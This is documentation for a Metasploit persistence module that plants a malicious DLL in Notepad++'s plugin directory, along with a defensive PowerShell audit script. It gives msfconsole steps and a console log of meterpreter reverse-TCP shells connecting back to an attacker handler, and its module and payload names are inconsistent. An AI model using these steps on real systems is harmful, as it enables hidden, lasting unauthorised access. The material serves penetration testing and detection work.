Notepadpp Plugin

documentation/modules/exploit/windows/persistence/notepadpp_plugin.md


Vulnerable Application

This module creates persistence by adding a malicious plugin to Notepad++, which blindly loads and executes DLLs from its plugin directory on startup, meaning that the payload will be executed every time Notepad++ is launched.

The payload will have the same privileges as the user executing Notepad++.
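The behaviour described above makes the plugin tree the thing to audit on a host. The following PowerShell script is an added defensive check, not part of the Metasploit module or of Notepad++: it flags plugin directories that broad groups can write to (the condition the module's AutoCheck looks for) and lists every plugin DLL with its Authenticode status and creation time. The install path in $PluginRoot is an assumed default.

```powershell
# Added audit script (not part of the Metasploit module). Lists every DLL under the
# Notepad++ plugin directory with its signature status, and reports plugin folders
# that broad groups can write to. $PluginRoot is an assumed default install path.
param(
    [string]$PluginRoot = 'C:\Program Files\Notepad++\plugins'
)

if (-not (Test-Path -LiteralPath $PluginRoot)) {
    Write-Warning "Plugin directory not found: $PluginRoot"
    return
}

# Identities that should never hold write rights on a plugin directory.
$BroadIdentities = @('Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# FileSystemRights.Write covers WriteData/AppendData/WriteAttributes; Modify and
# FullControl are supersets, so a bitwise test against Write catches all of them.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]::Write

function Test-BroadWriteAccess {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $BroadIdentities -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band $WriteMask) -ne 0)) {
            return $true
        }
    }
    return $false
}

# 1. Directory-level check: the root and each plugin subfolder. A writable plugin
#    tree is what lets an unprivileged user drop a DLL that runs at next launch.
$dirs = @($PluginRoot) + (Get-ChildItem -LiteralPath $PluginRoot -Directory | ForEach-Object FullName)
foreach ($d in $dirs) {
    if (Test-BroadWriteAccess $d) { Write-Warning "Writable by a broad group: $d" }
}

# 2. Per-DLL inventory: unsigned DLLs in a recently created subfolder are the
#    artefact this module leaves behind. Newest entries are listed first.
Get-ChildItem -LiteralPath $PluginRoot -Recurse -Filter '*.dll' | ForEach-Object {
    $sig = Get-AuthenticodeSignature -FilePath $_.FullName
    [pscustomobject]@{
        Plugin    = $_.Directory.Name
        Dll       = $_.Name
        Signature = $sig.Status
        Signer    = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        Created   = $_.CreationTime
    }
} | Sort-Object Created -Descending | Format-Table -AutoSize
```

Run it from an elevated prompt so Get-Acl can read every subfolder; a plugin folder that is writable by Users or a DLL with Signature NotSigned in an unfamiliar subfolder is worth investigating.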

Verification Steps

  1. Start msfconsole
  2. Get a shell/meterpreter on a windows box
  3. Do: use exploit/windows/persistence/notepad++_persistence
  4. Do: set session #
  5. Do: run
  6. You should get persistence once the targeted application is opened and closed.

Options

PAYLOAD_NAME

Name of the payload file. Defaults to <random>.dll

Scenarios

Windows 10

Original shell

[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
LHOST => wg0
LPORT => 4242
[*] Started reverse TCP handler on 192.168.3.7:4242
[*] Meterpreter session 1 opened (192.168.3.7:4242 -> 10.5.134.148:49988) at 2025-11-12 16:24:53 +0100

meterpreter > getuid
Server username: WIN10_2004_8D28\Administrator
meterpreter > sysinfo
Computer        : WIN10_2004_8D28
OS              : Windows 10 2004 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

Persistence

msf exploit(multi/handler) > use exploit/windows/persistence/notepadpp_plugin_persistence 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/notepadpp_plugin_persistence) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/notepadpp_plugin_persistence) > set session 1 
session => 1
msf exploit(windows/persistence/notepadpp_plugin_persistence) > run verbose=true 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf exploit(windows/persistence/notepadpp_plugin_persistence) > [*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Notepad++ present and plugin folder is writable
[+] Writing payload to C:\Program Files\Notepad++\plugins\JzHPoxkI\
[*] Payload (9216 bytes) uploaded on WIN10_2004_8D28 to C:\Program Files\Notepad++\plugins\JzHPoxkI\
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/WIN10_2004_8D28_20251112.2704/WIN10_2004_8D28_20251112.2704.rc
[*] Sending stage (230982 bytes) to 10.5.134.148
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.134.148:50011) at 2025-11-12 16:27:19 +0100
msf exploit(windows/persistence/notepadpp_plugin_persistence) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  1         meterpreter x64/windows  WIN10_2004_8D28\Administrator @ WIN10_2004_8  192.168.3.7:4242 -> 10.5.134.148:49988 (10.5.
                                     D28                                           134.148)
  2         meterpreter x64/windows  WIN10_2004_8D28\Administrator @ WIN10_2004_8  192.168.3.7:4444 -> 10.5.134.148:50011 (10.5.
                                     D28                                           134.148)

msf exploit(windows/persistence/notepadpp_plugin_persistence) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10_2004_8D28
OS              : Windows 10 2004 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10_2004_8D28\Administrator